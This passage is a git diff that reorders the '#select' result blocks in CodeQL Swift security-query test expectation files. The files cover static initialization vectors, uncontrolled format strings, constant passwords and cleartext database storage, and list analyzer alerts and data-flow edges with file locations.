test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | 
diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 5e76f12687d2..94dd27a82c2f 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected 
@@ -1,27 +1,3 @@ -#select -| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | edges | UncontrolledFormatString.swift:77:12:77:22 | format | UncontrolledFormatString.swift:78:22:80:5 | format | provenance | | | UncontrolledFormatString.swift:78:22:80:5 | format | UncontrolledFormatString.swift:78:22:80:5 | { ... } [format] | provenance | | 
@@ -96,3 +72,27 @@ nodes | UncontrolledFormatString.swift:154:26:154:26 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:156:32:156:32 | tainted | semmle.label | tainted | subpaths +#select +| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected index 80758dc286ca..0c1e98bfe7c6 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected 
@@ -1,30 +1,3 @@ -#select -| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. 
| -| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. 
| -| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | edges | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | provenance | | 
@@ -91,3 +64,30 @@ nodes | test.swift:67:34:67:34 | constantPassword | semmle.label | constantPassword | | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths +#select +| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. 
| +| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. 
| +| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index e3517d648265..204e2486cc2f 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected 
@@ -1,143 +1,3 @@ -#select -| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:149:31:149:31 | [...] 
